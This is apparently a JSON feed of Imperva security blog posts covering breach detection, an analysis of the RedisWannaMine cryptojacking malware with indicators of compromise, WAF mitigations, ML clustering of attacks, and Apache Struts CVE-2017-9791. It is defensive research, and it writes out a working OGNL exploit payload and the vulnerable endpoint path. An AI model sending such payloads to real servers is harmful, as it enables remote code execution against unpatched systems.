Penetrating the organization's IT environment\n\n * Malware installed on an endpoint operating system via a phishing attack.\n * Account Takeover (ATO) attacks that use stolen credentials to penetrate the organization\u2019s environment.\n\n2\\. Analyzing network resources to locate databases that hold personal, financial, or business-critical information.\n\n3\\. Making the original stored data unusable by:\n\n * Encrypting the data.\n * Extracting the data, either to a hidden file in the network or outside.\n * Modifying the stored data values.\n\n### Ransomware attack detection example\n\nIn this attack, the data is moved from the original database to a readme file.\n\nDB breach flow:\n\n 1. Attacker queries for the list of databases.\n 2. Attacker selects prod_db.\n 3. Data is stolen from prod_db using 'select' statements.\n 4. prod_db is deleted using 'drop'.\n\n## How should organizations protect their home environment?\n\nImperva research shows that, much like using a safe at home, when organizations secure their data repositories with a data-centric security fabric, and when a hostile penetration occurs, they dramatically reduce data exfiltration risk by turning all open repositories into well-protected, alarm-enabled safes. This shortens the path from breach to detection to response.\n\nAs business innovation and the services that support it are digitally transformed, the perimeter boundaries have blurred. The \u201cwalls\u201d that protect data repositories have cracks that allow attackers to put their hands on sensitive data, effectively ending the days of protecting assets within the network perimeter. The security of an organization is only as strong as the weakest link in the security chain. In many cases, better architecture and cross-organization security practices would do the trick, but those practices are not easy to implement and control, nor do they account for the risks presented by third-party technology providers. 
You must secure all the data repositories they manage, not just the applications and networks that surround them.\n\nThe cause of most breaches is the lack of an in-depth data security strategy. As we discussed before, you can reduce the attack surface by securing your data repositories, but you must first gain visibility into them. Next, eliminate excessive privileges from key users and deploy strong authentication mechanisms. Never forget that securing data repositories is a never-ending process; you must always work toward optimizing your security architecture, policies, and practices, both for your assets and employees. Continuously performing data discovery and classification to locate sensitive personal data is a great way to maintain an enterprise-grade data security strategy and eliminate bad practices inside on-premises and cloud-managed environments. Together with implementing [Imperva\u2019s Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and [Imperva Data Security Fabric](<https://www.imperva.com/products/data-security-fabric/>), it is possible to protect against most potential data breach scenarios.\n\n## On-Demand Webinar: Detecting Attacks on Your Data. How can we do it right?\n\n[Watch now.](<https://community.imperva.com/events/event-description?CalendarEventKey=afb10612-12cf-4e6d-9fe6-b3a4486a966f&CommunityKey=39c6092a-d67a-4bc2-8134-bfbb25fc43af&Home=%2fevents>)\n\nSecurity analytics are an essential part of the toolkit to protect against data breaches. Are you using Imperva Data Risk Analytics (DRA)? Imperva Data Risk Analytics tools have been purpose-built to recognize threats such as suspicious data access or signs of potentially compromised accounts. 
But did you know Imperva recently added new features that can recognize the attack signatures of active exploits so you can be instantly notified of an attack in progress?\n\nIn this webinar, Product Manager Oren Graiver, will describe how you can use [Imperva Data Risk Analytics](<https://www.imperva.com/solutions/user-behavior-analytics/>) to augment Imperva vulnerability assessment and data activity monitoring and transform your security posture to proactively prevent data compromise incidents. Topics covered will include:\n\n * Where breaches are found\n * Understanding data breach detection\n * Early signs of a breach\n * Kill chain and data compromise\n * Real life example of a breach DRA can detect - Ransomware\n * What\u2019s on the roadmap?\n\n[Watch the webinar today](<https://community.imperva.com/events/event-description?CalendarEventKey=afb10612-12cf-4e6d-9fe6-b3a4486a966f&CommunityKey=39c6092a-d67a-4bc2-8134-bfbb25fc43af&Home=%2fevents>).\n\nThe post [Two New Trends Make Early Breach Detection and Prevention a Security Imperative](<https://www.imperva.com/blog/two-new-trends-make-early-breach-detection-and-prevention-a-security-imperative/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-31T13:47:34", "type": "impervablog", "title": "Two New Trends Make Early Breach Detection and Prevention a Security Imperative", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-08-31T13:47:34", "id": "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "href": "https://www.imperva.com/blog/two-new-trends-make-early-breach-detection-and-prevention-a-security-imperative/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-03-08T20:51:51", "description": "Recently cryptojacking attacks have been spreading like wildfire. At Imperva we have witnessed it firsthand and even concluded that these attacks [hold roughly 90% of all remote code execution attacks in web applications](<https://www.imperva.com/blog/2018/02/new-research-crypto-mining-drives-almost-90-remote-code-execution-attacks/>).\n\nHaving said that, all of the attacks we have seen so far, were somewhat limited in their complexity and capability. The attacks contained malicious code that downloaded a cryptominer executable file and ran it with a basic evasion technique or none at all.\n\nThis week we saw a new generation of cryptojacking attacks aimed at _both_ database servers and application servers. We dubbed one of these attacks _RedisWannaMine._\n\n_RedisWannaMine_ is more complex in terms of evasion techniques and capabilities. 
It demonstrates a worm-like behavior combined with advanced exploits to increase the attackers\u2019 infection rate and fatten their wallets.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/Screen-Shot-2018-03-08-at-7.43.49-AM.png>)\n\nIn a nutshell, **cryptojacking attackers have upped their game and they are getting crazier by the minute!**\n\n## Cryptojacking 2.0/ RedisWannaMine\n\nImperva deploys a network of sensors to gather security intelligence. These sensors are deployed in publicly accessible databases and web servers. This week we recorded an interesting remote code execution (RCE) attack through our web application sensors. When we record an RCE attack that tries to download an external resource, we try to probe the remote host to gain further security information. This was the case this week when our sensors recorded the following attack vector that tried to exploit [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>):\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic1.png>)\n\nWhen we probed the remote server we found a list of suspicious files:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/Picture2.png>)\n\nThe list includes known malicious files, like _minerd_, but also some unknown suspicious files like _transfer.sh_.\n\nWhen we submitted the _transfer.sh_ hash to VirusTotal, we found it is fairly new: the first submission was on 2018-03-05 and it was detected by only 10 engines:\n\nThis shell script file is a downloader that is similar in some ways to older cryptojacking downloaders we know:\n\n * It downloads crypto miner malware from an external location\n * It gains persistence on the machine through new entries in _crontab_\n * It gains remote access to the machine through a new ssh key entry in _/root/.ssh/authorized_keys_ and new entries in the system\u2019s _iptables_\n\nHowever, this downloader is unlike any downloader 
we\u2019ve seen before. In the following sections, we will list the new capabilities it offers.\n\n## Self-sufficient\n\nThe script installs a lot of packages using standard Linux package managers like _apt_ and _yum_. This is probably to make sure it is self-sufficient and does not need to depend on local libraries on the victim\u2019s machine. As a hint of things to follow, we saw it install packages like _git, python, redis-tools, wget, gcc_ and _make_.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic4.png>)\n\n## Github integration\n\nThe script downloads a publicly available tool, named _masscan_, from a Github repository, then compiles and installs it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic5.png>)\n\nThe project page <https://github.com/robertdavidgraham/masscan> describes it as \u201cTCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.\u201d\n\nAlso, it offers simple usage examples:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic6.png>)\n\n## Redis scan and infection\n\nThe script then launches another process named \u201c_redisscan.sh_\u201d. The new process uses the _masscan_ tool mentioned above to discover and infect publicly available Redis servers. It does so by creating a large list of IPs, **internal** and **external**, and scanning port 6379, which is the default listening port of Redis.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic7.png>)\n\nIf one of the IPs in the list is publicly available, the script launches the \u201c_redisrun.sh_\u201d process to infect it with the same crypto miner malware (\u201c_transfer.sh_\u201d). 
The infection is done using the _redis-cli_ command line tool, which the downloader previously installed, to run the \u201c_runcmd_\u201d payload.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic8.png>)\n\n\u201c_runcmd_\u201d is a 10-line Redis command script that creates new entries in the Redis server\u2019s crontab directory, and thus infects the server and gains persistence in case someone notices the malware and deletes it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic9.png>)\n\nNotice that the attacker uses line feeds, \u201c_\\n_\u201d, at the beginning and at the end of each key value. If you run these commands in a Redis server, a file with the following content will be created:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic10.png>)\n\n## SMB scan and infection\n\nAfter the script completes the Redis scan, it launches another scan process named \u201c_ebscan.sh_\u201d. This time the new process uses the _masscan_ tool to discover and infect publicly available Windows servers with the vulnerable SMB version. It does so by creating a large list of IPs, **internal** and **external**, and scanning port 445, which is the default listening port of SMB.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.1.png>)\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.2.png>)\n\nIn case you\u2019ve been living under a rock, the SMB vulnerability this script is scanning for was used by the NSA to create the infamous \u201c_Eternal Blue_\u201d exploit. 
This exploit was later on adapted to carry out \u201c_WannaCry_\u201d, one of the biggest cyberattacks in the world.\n\nWhen the script finds a vulnerable server, it launches the \u201c_ebrun.sh_\u201d process to infect it.\n\n\u201c_ebrun.sh_\u201d runs a Python implementation of the aforementioned \u201c_Eternal Blue_\u201d exploit and drops the file \u201c_x64.bin_\u201d on the vulnerable machine.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic12.png>)\n\nWe used the _strings_ command to print all the strings of printable characters in the file and found code that creates a malicious VBScript file named \u201c_poc.vbs_\u201d and runs it.\n\n\u201c_poc.vbs_\u201d downloads an executable from an external location, saves it on the vulnerable server as \u201c_admissioninit.exe_\u201d and runs it. Needless to say, \u201c_admissioninit.exe_\u201d is a well-known crypto miner malware.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic13.png>)\n\n## What should I do?\n\n * Protect your web applications and databases. The initial attack vector was introduced through a web application vulnerability. A properly patched application or an application protected by a WAF should be safe.\n * Make sure you don\u2019t expose your Redis servers to the world. This can be achieved with a simple firewall rule.\n * Make sure you don\u2019t run machines with the vulnerable SMB version in your organization. 
You can use [this](<http://omerez.com/eternalblues/>) awesome tool to check it.\n\n## IOC\n\n**Hosts:**\n\nhttp://ipfs.io/\n\nhttp://admission.fri3nds.in/\n\n**IPs:**\n\n147.135.130.181\n\n217.182.195.23\n\n**Files:**", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-08T18:45:38", "type": "impervablog", "title": 
"RedisWannaMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2018-03-08T18:45:38", "id": "IMPERVABLOG:38007E943B20A50B729BC17911999C11", "href": "https://www.imperva.com/blog/2018/03/rediswannamine-new-redis-nsa-powered-cryptojacking-attack/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-26T20:41:18", "description": "We previously reported that the overall number of new web application vulnerabilities in 2017 showed a 212% increase from 2016\u2019s 6,615 to a whopping 14,082. This spike was due, in part, to high-profile vulnerabilities like Heartbleed, Shellshock, POODLE, Apache Struts 2 and more recently, Meltdown and Spectra.\n\nThere is, however, good news in the form of a new tool tasked with pushing mitigations for high-profile vulnerabilities like these to the SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) within a matter of hours.\n\n## Ongoing Vulnerability Protection\n\nTasking your security team with analyzing each and every vulnerability, deciding their relevance and applying the necessary mitigations is near impossible, which is why [virtual patching of your WAF](<https://www.imperva.com/blog/2017/03/deploy-instant-virtual-patching-on-securesphere-waf-with-highly-accurate-web-vulnerability-data/>) is so important. 
Not updating your WAF regularly is like wearing your old 80s jeans thinking you\u2019re still cool\u2026you\u2019re not. Imperva regularly releases mitigations for new vulnerabilities.\n\n> In today\u2019s tech landscape, where constantly up-leveled cyberattacks are one of the most prominent threats to corporate assets, timing is everything.\n\nOnce a [vulnerability is published](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) it\u2019s only a matter of time until attackers exploit it. It only takes a few hours for high-quality code snippets to be published, and by then every script kiddie has had the opportunity to run them against whomever they choose. In the case of a [2017 Apache Struts vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), for example, an official exploit was made public one day after the vulnerability was announced. Clearly, updating mitigations only once every few weeks is not enough.\n\n## The Answer: An Emergency Feed\n\nImperva has incorporated an emergency feed into our ThreatRadar subscription service as an extension of our WAF, which allows Imperva security researchers to push mitigations for high-profile vulnerabilities to the WAF in just a matter of hours. Our goal is to push mitigations via the emergency feed within 24 hours of the vulnerability\u2019s publication, so whether a new vulnerability hits the landscape in the middle of the night or your entire security team is on vacation, your WAF estate is protected.\n\n## So, how do we do it?\n\nTo qualify for mitigation through the emergency feed, a vulnerability must be remotely exploitable, operable without authentication, and have the potential to be highly impactful. In these cases, Imperva researchers analyze the vulnerability, understand its scope, and create the appropriate mitigation. 
The mitigation is then run through a wide set of Incapsula and SecureSphere customers, on real-world data, to observe its false positive rate and search for the vulnerability\u2019s variations. Only when our researchers are convinced that the new mitigation is stable and reliable will they push it into the emergency feed.\n\nSimply put, in just a few hours, all of Imperva\u2019s customers on Incapsula and SecureSphere WAFs are fully protected. The best part? There\u2019s no action required by your in-house security team. As soon as they\u2019re back in the office they have access to a report summarizing the nature of the vulnerability and the mitigation applied.\n\n## Included with ThreatRadar Subscription\n\nIf you\u2019re a SecureSphere customer with a [ThreatRadar](<https://www.imperva.com/products/threatradar-intelligence/>) subscription, the emergency feed is included and takes only a few clicks to enable. Incapsula customers receive this service out of the box \u2013 no registration required.\n\nFor SecureSphere customers with a ThreatRadar subscription:\n\n 1. Check the **Emergency Feed** box on the customer portal to register.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-1.png>)\n\n 2. In the Imperva SecureSphere WAF dashboard, enable the **Emergency Feed services** under the ThreatRadar tab.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-2.png>)\n\nThat\u2019s it. The emergency feed is enabled and will begin receiving new mitigations immediately. With each content update, our researchers will remove the most recent mitigations from the emergency feed and permanently add them to your SecureSphere WAF, so your system is updated. 
You will be notified of updates via email.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-26T19:01:59", "type": "impervablog", "title": "Keeping Your WAF Relevant: Emergency Feed Pushes New Mitigations in Just Hours", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-26T19:01:59", "href": "https://www.imperva.com/blog/2018/04/keeping-waf-relevant-emergency-feed-pushes-new-mitigations-just-hours/", "id": "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-20T00:15:21", "description": "In the previous blog posts in this series, we discussed the motivation for clustering attacks and the data used and how to calculate the distance between two attacks using different methods on each feature we extracted. In this final blog post, we\u2019ll discuss the clustering algorithm itself \u2013 how to use the distance we calculated to create clusters from the data. We will discuss clustering in real time when only a small amount of data can be stored in memory. 
Finally, we\u2019ll show some results of the algorithm based on real data from Imperva customers.\n\n## Choosing a (realtime) clustering algorithm\n\nNow we have all the basic ingredients to input into the algorithm. What\u2019s left to decide is which clustering algorithm to use. There are many algorithms to choose from that meet varying needs; for example, we\u2019ve previously written about [clustering](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) techniques used in Imperva CounterBreach.\n\nHere\u2019s where the algorithm reality punched us right in the face: the demand from our engineering team was that the **clustering is done in** **real time**. This means that each time a new event enters the system, the algorithm needs to decide on the spot how to cluster it and update the current clustering state. This had to be done with minimal memory, which meant that individual events could not be stored in memory.\n\nThe more popular and well-known clustering algorithms work on a batch of data instead of a stream, i.e., their input is a static dataset. So, this real-time requirement meant we had to look for other algorithms that work in streaming mode.\n\nThere are a [couple of methods](<https://en.wikipedia.org/wiki/Data_stream_clustering>) to use to cluster a stream of data. We won\u2019t discuss these methods as they are more complex and technical; instead, we\u2019ll present the requirements of our algorithm and what was needed for them to be met.\n\n## Clustering requirements in streaming mode\n\nFirst, a clustering algorithm in streaming mode needs to make decisions in real time, meaning that the algorithm maintains in memory a current state of the clusters and each time a new event enters the system the algorithm updates the clustering state. 
This is done instantaneously and without storing the discrete event in memory.\n\nSecond, we need to remember that each time the algorithm was making a decision it was doing so based on partial data. That\u2019s because the algorithm only processed past data. If the algorithm were to know **all** of the events (past and future events) the decision it would make might be different. So, the algorithm must have a way to **undo decisions** it made in the past. The way the algorithm undoes its decisions is by splitting a cluster into smaller parts and merging the parts into other clusters that are the best fit.\n\nFinally, most of the streaming clustering algorithms from academic articles work on spatial data. This means that their inputs are points in a Euclidean space (think of it as coordinates in an n-dimensional space). Our data is more complex: it contains URLs, which are strings, IPs, geographic coordinates and other varying features. These features cannot be easily embedded into a Euclidean space, and even if they could, it would make no sense to do so. So, the algorithm we needed had to assume only that we can calculate the distance between two data points, and not that they are embedded into a Euclidean space.\n\nWe used a homegrown algorithm to answer these needs. Clustering in streaming mode is always a trade-off between the accuracy of the results and time and memory efficiency. We tried to find the balance so the result would be as accurate as possible while storing only the minimum amount of data needed in memory and performing the least possible amount of calculations with each incoming event. 
See Figure 7 for the general flow of clustering in streaming mode.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/05/Clustering.png>)\n\nFigure 7: Clustering in streaming mode - clusters may change due to new events entering the system\n\nWe stored aggregated structured data in memory instead of raw events; this way we were able to split clusters, to some extent, and rearrange them as would seem most appropriate. Also, in order to process data in real time, most of the time we used a light-weight distance function that wouldn\u2019t take too much time to calculate and didn\u2019t consider all the features. We used a heavier and more accurate distance function that considered all the features only at predefined times when there were enough new events that entered the system, as we expected the clustering state might change significantly.\n\nAlso, for performance considerations, we couldn\u2019t cluster all the events from the beginning each time a new event entered the system. That\u2019s why every time a new event came in the algorithm used its current clustering state to do calculations only on the clusters that may change due to the new event. This way we significantly reduced the time it took to process each new event.\n\n## Results of the algorithm: Customer use cases\n\nFor validation of the algorithm, some of our web application firewall (WAF) customers provided us with logs containing events from their WAF. Here are three highlighted clusters which contain incidents we thought were interesting:\n\n### Nginx integer overflow\n\nCVE-2017-7529 is a vulnerability of Nginx that allows an attacker to launch an integer overflow attack using a crafted \u201crange\u201d header. We saw a cluster on a customer\u2019s WAF containing over two thousand attacks from over 100 distinct IPs over a period of three days trying to exploit this vulnerability. Over 80% of the attacks came from the US and most of the attacks seemed to use the same attack tool. 
Also, the attack targeted many different URLs, although it targeted only two resource extensions: PDF and CFM.\n\n### Email harvesting\n\nEmail collector robots try to scrape web applications to find email addresses. The purpose of email harvesting is mostly to collect lists of emails in order to sell them to spammers. We saw a cluster on a customer\u2019s WAF which contained over 50 distinct IPs that performed email harvesting. The source of these attacks was very distributed, from the US, Europe, South America and Asia. Most of the targets were the home page of the application. This means that after the robots were blocked at the home page they didn\u2019t proceed to scrape the rest of the site, probably moving on to try other websites which are not protected by a WAF. The same cluster was also found in more than five different web applications we analyzed, indicating this is a popular attack.\n\n### Attacks on Apache Struts vulnerabilities\n\nIn [previous blog posts](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) we discussed Apache Struts vulnerabilities, and how they are very popular among attackers, especially ones from Asian countries. [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) is an Apache Struts vulnerability published in March 2017 that allows attackers to launch remote code execution attacks using a crafted \u201ccontent-type\u201d header. We saw a cluster of attacks trying to utilize this vulnerability; most of the attacks came from China and the target was very distributed, containing multiple URLs. Also, in addition to this specific vulnerability, the attackers tried to utilize other vulnerabilities of Apache Struts. This is a popular phenomenon we see in our data: attackers trying to utilize different vulnerabilities of the same system, in this case Apache Struts. 
The cluster appeared on over ten different web applications we analyzed, and all the clusters contained similar attributes. This indicates the popularity of Apache Struts vulnerabilities among attackers.\n\n## Conclusion\n\nClustering application attacks is a challenging task that requires a lot of research and experimentation. Throughout the process, we encountered many difficulties and made a number of decisions regarding the algorithm, many of them due to real-life constraints not seen in academic research. Customer applications don\u2019t live in a lab so the solutions that protect them can\u2019t either.\n\nKnowledge of the application security domain and a deep understanding of data are both \u2013 in our experience \u2013 crucial prerequisites for the design and implementation of any successful machine learning algorithm built to protect apps and the data that connects to them.\n\nLearn more about protecting apps from attacks with [Imperva SecureSphere](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) or [Imperva Incapsula](<https://www.incapsula.com/website-security/web-application-firewall.html>) Web Application Firewall.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-06-19T22:41:03", "type": "impervablog", "title": "Clustering App Attacks with Machine Learning Part 3: Algorithm Results", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-7529"], "modified": "2018-06-19T22:41:03", "id": "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "href": "https://www.imperva.com/blog/2018/06/clustering-app-attacks-with-machine-learning-part-3-algorithm-results/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T02:18:38", "description": "On July 7th, a new security vulnerability was published in Apache Struts 2 CVE-2017-9791 (S2-048[1]). Struts 2.3.x users with Struts 1 plugin, which includes the Showcase app, are vulnerable.\n\nOnce again, this vulnerability enables a Remote Code Execution (RCE), which is the most commonly exploited Apache Struts vulnerability. In this case, as in many other cases of RCE in Apache Struts, the attacks observed in the wild are also carried in the form of Object-Graph Navigation Language (OGNL) expressions.[2]\n\nLike the recent Struts 2 RCE [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), Imperva customers are protected against current variations of the attack using the zero-day attack detection mechanism in either SecureSphere or Incapsula. The zero-day attack detection mechanism protects against malicious traffic regardless of a specific web exploit.\n\n## The Vulnerability\n\nBased on [Apache release notes](<https://cwiki.apache.org/confluence/display/WW/S2-048>), \u201cit is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user\u201d. 
The message presented to the user is processed by the \u201cActionMessage\u201d routine and returned back to the user by the \u201cmessage\u201d function as follows:\n \n \n messages.add(\"msg\", new ActionMessage(**the_message**));\n\nLacking proper validation before execution, the message (the_message) processed by the server may potentially cause a remote code execution. To fulfill its execution potential, a remote entry point is required for the message. Following the route of the vulnerable code leads to this location:\n \n \n /struts2-showcase/integration/saveGangster.action\n\nPoking around the webpage reveals several inputs controlled by the user, including name, age, and description (see Figure 1):\n\n\n\n_Figure 1: Vulnerable Apache Struts application_\n\nWhen submitting the \u201cGangster\u201d data the server processes the user\u2019s input with the vulnerable \u201cActionMessage\u201d routine and returns a message to the user (see Figure 2):\n\n\n\n\n\n_Figure 2: Request to the vulnerable page and result_\n\nAs can be observed, the processed message is integrated with the user\u2019s input data (\u201c_Gangster a added\u2026_\u201d) which means now the input data can be modified to include arbitrary code execution (see Figure 3). 
For instance, the RCE payload can add a custom header to the response message or use an OGNL mechanism to run malicious code (see the second payload in \u201cAttacks in the Wild\u201d section):\n\n\n\n_Figure 3: Exploitation of the vulnerable application_\n\n## Imperva Zero-Day Protection\n\nAs mentioned earlier, Imperva customers are protected against this new Apache Struts vulnerability using zero-day detection mechanisms from either SecureSphere or Incapsula, which detect incoming traffic with malicious content, regardless of a specific vulnerability or exploit.\n\nThe zero-day detection technique prevents the new attack using two complementary deterrence layers:\n\n * First, since the exploit includes an arbitrary remote code to be executed, customers are protected out-of-the-box to most attack variations using a generic Remote Command Execution mitigation mechanism (see Figure 4):\n\n\n\n_Figure 4: SecureSphere blocking a generic RCE_\n\n * Then, in the second layer of defense, SecureSphere and Incapsula both detect potential OGNL expressions which are used to manipulate Java objects, and are commonly used by attackers to inject remote code in vulnerable Apache Struts servers, including in this attack (see Figure 5):\n\n__\n\n_Figure 5: SecureSphere blocking a generic OGNL-based RCE_\n\nNevertheless, to be on the safe side, a few hours following the release of this critical vulnerability our security teams published a dedicated mitigation guideline and virtually patched Imperva customers.\n\n## Attacks in the Wild\n\nAn increasing amount of attack attempts have been seen since the publication of this new Struts vulnerability, mostly as hard copy replication of PoCs published shortly after the first announcement, and refer to reconnaissance attempts to track vulnerable servers. 
Below are details on two common payloads seen in the wild.\n\n### Payload #1: Custom Header Insertion Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-BIGSCAN-Test','fe9a40f002fe11e7b4ef0242c0a8050')}** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nHTTP headers are easily parsed and extracted with automated scripts, so checking for the presence of a new custom HTTP header is straightforward for attackers to implement and can be used as a reconnaissance request before the actual attack \u2013 i.e., the actual RCE which will take over the server.\n\nIn most cases attackers will use this kind of reconnaissance as part of a vulnerability scanning tool run against predefined IP ranges, allowing bots to effectively scan a wide range of addresses. Based on our classification analysis, IPs that were registered in this attack are known to generate mostly bot traffic (~96%).\n\n### Payload #2: OGNL Expression Execution Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | 
